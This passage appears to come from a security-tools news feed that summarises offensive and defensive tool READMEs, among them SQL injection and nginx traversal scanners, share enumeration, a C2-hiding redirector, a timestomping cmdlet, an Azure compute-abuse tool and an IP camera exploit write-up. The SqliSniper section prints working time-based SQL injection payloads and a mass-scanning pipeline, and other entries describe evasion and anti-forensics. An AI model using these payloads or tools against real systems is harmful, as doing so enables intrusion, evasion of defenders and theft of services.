  • -Path: The path to the file or directory whose timestamps you wish to modify.
  • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
  • -Credentials: (Optional) If you need to specify a different user's credentials.
  • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

Usage Examples

Specify the -Recurse switch to apply timestamps recursively:

  1. Change the timestamp of an individual file:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
  1. Recursively change timestamps for all files in a directory:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse 
  1. Use specific credentials:

Sncscan - Tool For Analyzing SAP Secure Network Communications (SNC)

By: Zion3R
1 February 2024 at 11:30


Tool for analyzing SAP Secure Network Communications (SNC).

How to use?

In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.


SAP Router

SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan find out if it is activated:

sncscan -H 10.3.161.4 -S 3299 -p router

DIAG / SAP GUI

The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan and impact the connections security is in the section Background

sncscan -H 10.3.161.3 -S 3200 -p diag

Multiple targets can be scanned with one command:

sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206 

Through SAP Router

sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag

Install

Requirements: Currently the sncscan only works with the pysap libary from our fork.

python3 -m pip install -r requirements.txt

or

python3 setup.py test
python3 setup.py install

Background: SNC system parameters

SNC Basics

SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:

  1. Authentication only: Verifies the identity of the communication partners
  2. Integrity protection: Protection against manipulation of the data
  3. Confidentiality protection: Encrypts the transmitted messages

SNC Parameter

Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:

  • snc/data_protection/min: Minimum security level required for SNC connections.
  • snc/data_protection/max: highest security level, initiated by the SAP system
  • snc/data_protection/use: default security level, initiated from the SAP system

Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.

Reading out SNC Parameters

As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.



Melee - Tool To Detect Infections In MySQL Instances

By: Zion3R
2 February 2024 at 11:30

MELEE: A Tool to Detect Ransomware Infections in MySQL Instances


Attackers are abusing MySQL instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destruct data, and extort money via ransom. For example one of the significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:

  • MySQL instance information gathering and reconnaissance
  • MySQL instance exposure to the Internet
  • MySQL access permissions for assessing remote command execution
  • MySQL user enumeration
  • MySQL ransomware infections
  • Basic assessment checks for detecting ransomware infections
  • Extensive assessment checks for extracting insidious details about potential ransomware infections
  • MySQL ransomware detection and scanning for both unauthenticated and authenticated deployments

Tool Usage

Researched and Developed By Aditya K Sood and Rohit BansalΒ 

Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R
3 February 2024 at 11:30


Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

Post Name Publication Date Link
Hacking With Your Nemesis Aug 9, 2023 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
Challenges In Post-Exploitation Workflows Aug 2, 2023 https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
On (Structured) Data Jul 26, 2023 https://posts.specterops.io/on-structured-data-707b7d9876c6

Acknowledgments

Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

By: Zion3R
4 February 2024 at 11:30

This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

Visit our website - secureci.org for more information.


Features

  • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

  • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.

Usage

This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]

Parameters:

  • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
  • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
  • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
  • --config: The config file. This parameter is optional.
  • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
  • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
  • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.

Example:

To use this script to interact with a GitHub repo, you might run a command like the following:

python argus.py --mode repo --url https://github.com/username/repo.git --branch master

This would run the script in repo mode on the master branch of the specified repository.

How to use

Argus can be run inside a docker container. To do so, follow the steps:

  • Install docker and docker-compose
    • apt-get -y install docker.io docker-compose
  • Clone the release branch of this repo
    • git clone <>
  • Build the docker container
    • docker-compose build
  • Now you can run argus. Example run:
    • docker-compose run argus --mode {mode} --url {url to target repo}
  • Results will be available inside the results folder

Viewing SARIF Results

You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

  1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

  2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.

Troubleshooting

If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.

Contributions

Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

Cite Argus

If you use Argus in your research, please cite our paper:

  @inproceedings{muralee2023Argus,
title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32st USENIX Security Symposium (USENIX Security 23)},
year={2023},
}


Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R
5 February 2024 at 11:30


navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Techniques

Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:

Heuristics

navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.

Brute-force

navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.

Installation

git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build

Acknowledgements



SharpShares - Multithreaded C# .NET Assembly To Enumerate Accessible Network Shares In A Domain

By: Zion3R
6 February 2024 at 11:30


Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain


Built upon djhohnstein's SharpShares project

> .\SharpShares.exe help

Usage:
SharpShares.exe /threads:50 /ldap:servers /ou:"OU=Special Servers,DC=example,DC=local" /filter:SYSVOL,NETLOGON,IPC$,PRINT$ /verbose /outfile:C:\path\to\file.txt

Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not ran on a domain-joined host)
/domain - specify domain name (if not ran on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
:all - All enabled computers with 'primary' group 'Domain Computers'
:dc - All enabled Domain Controllers (not read-only DCs)
:exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
:servers - All enabled servers
:servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
/ou - specify LDAP OU to query enabled computer objects from
ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration
default: SYSVOL,NETLOGON,IPC$,PRINT$
/outfile - specify file for shares to be appended to instead of printing to std out
/verbose - return unauthorized shares

Execute Assembly

execute-assembly /path/to/SharpShares.exe /ldap:all /filter:sysvol,netlogon,ipc$,print$

Example Output

Specifying Targets

The /ldap and /ou flags can be used together or seprately to generate a list of hosts to enumerate.

All hosts returned from these flags are combined and deduplicated before enumeration starts.



BounceBack - Stealth Redirector For Your Red Team Operation Security

By: Zion3R
7 February 2024 at 11:30


BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.

The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.

For more information on tool usage, you may visit project's wiki.


Features

  • Highly configurable and customizable filters pipeline with boolean-based concatenation of rules will be able to hide your infrastructure from the most keen blue eyes.
  • Easily extendable project structure, everyone can add rules for their own C2.
  • Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors combined with IP filter to disallow them to use/attack your infrastructure.
  • Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable's config and reject invalidated packets.
  • Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
  • Ability to check the IPv4 address of request against IP Geolocation/reverse lookup data and compare it to specified regular expressions to exclude out peers connecting outside allowed companies, nations, cities, domains, etc.
  • All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
  • Support for multiple proxies with different filter pipelines at one BounceBack instance.
  • Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.

Rules

BounceBack currently supports the following filters:

  • Boolean-based (and, or, not) rules combinations
  • IP and subnet analysis
  • IP geolocation fields inspection
  • Reverse lookup domain probe
  • Raw packet regexp matching
  • Malleable C2 profiles traffic validation
  • Work (or not) hours rule

Custom rules may be easily added, just register your RuleBaseCreator or RuleWrapperCreator. See already created RuleBaseCreators and RuleWrapperCreators

Rules configuration page may be found here.

Proxies

At the moment, BounceBack supports the following protocols:

  • HTTP(s) for your web infrastructure
  • DNS for your DNS tunnels
  • Raw TCP (with or without tls) and UDP for custom protocols

Custom protocols may be easily added, just register your new type in manager. Example proxy realizations may be found here.

Proxies configuration page may be found here.

Installation

Just download latest release from release page, unzip it, edit config file and go on.

If you want to build it from source, install goreleaser and run:

goreleaser release --clean --snapshot


SADProtocol goes to Hollywood

By: Zion3R
8 February 2024 at 11:30

Faraday’s researchers Javier Aguinaga and Octavio Gianatiempo have investigated on IP cameras and two high severity vulnerabilities.


This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.


They uncovered two LAN remote code execution vulnerabilities in EZVIZ’s implementation of Hikvision’s Search Active Devices Protocol (SADP) and SDK server:

  • CVE-2023-34551: EZVIZ’s implementation of Hikvision’s SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
  • CVE-2023-34552: EZVIZ’s implementation of Hikvision’s SADP packet parser pre-auth stack buffer overflows (CVSS3 8.8 - HIGH)

The affected code is present in several EZVIZ products, which include but are not limited to:


Product Model Affected Versions
CS-C6N-B0-1G2WF Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR Versions below V5.2.3 build 230217
EZVIZ LC1C Versions below V5.3.4 build 230214


These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean’s Eleven:



Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational. A deep detailed dive into the whole research process, can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in memory code patching and manipulating the execution of the binary that implements most of the camera features.



This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.



CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

By: Zion3R
9 February 2024 at 11:30


Execute code within Azure Automation service without getting charged

Description

CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

  • This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.

  • Each execution is limited to 3 hours


Requirements

  1. Python 3.8+ with the libraries mentioned in the file requirements.txt
  2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
    • Account must be logged in before using this tool

Installation

pip install .

Usage

usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

CloudMiner - Free computing power in Azure Automation Service

optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
utomationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode

Example usage

Python

Powershell

License

CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

Author - Ariel Gamrian



SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers

By: Zion3R
10 February 2024 at 11:30


SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.


Key Features

  • Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
  • Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
  • Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
  • False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
  • Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.

Installation

git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt

Usage

This will display help for the tool. Here are all the options it supports.

ubuntu:~/sqlisniper$ ./sqlisniper.py -h


β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–„β–„ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β–€β–€β•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•β•β•β•šβ•β•β•šβ•β• β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•

-: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PA YLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]

Detect SQL injection by sending malicious queries

options:
-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads

Running SqliSniper

Single Url Scan

The url can be provided with -u flag for single site scan

./sqlisniper.py -u http://example.com

File Input

The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

./sqlisniper.py -r url.txt

piping URLs

The SqliSniper can also worked with the pipeline input with -p flag

cat url.txt | ./sqlisniper.py -p

The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

Scanning with custom payloads

By default the SqliSniper use the payloads.txt file. However --payload flag can be used for providing custom payloads file.

./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.

ubuntu:~/sqlisniper$ cat payloads.txt 
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z

Scanning with Single Payloads

If you want to only test with the single payload --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%

./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

Scanning Custom Header

Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.

ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1

Sending Discord Alert Notifications

SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

./sqlisniper.py -r url.txt --discord <web_hookurl>

Multi-Threading

Threads can be defined with --threads flag

 ./sqlisniper.py -r url.txt --threads 10

Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.


SqliSniper is made inΒ  pythonΒ with lots of <3 by @Muhammad Danial.



Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R
14 February 2024 at 11:30

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R
15 February 2024 at 11:30


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.



❌
❌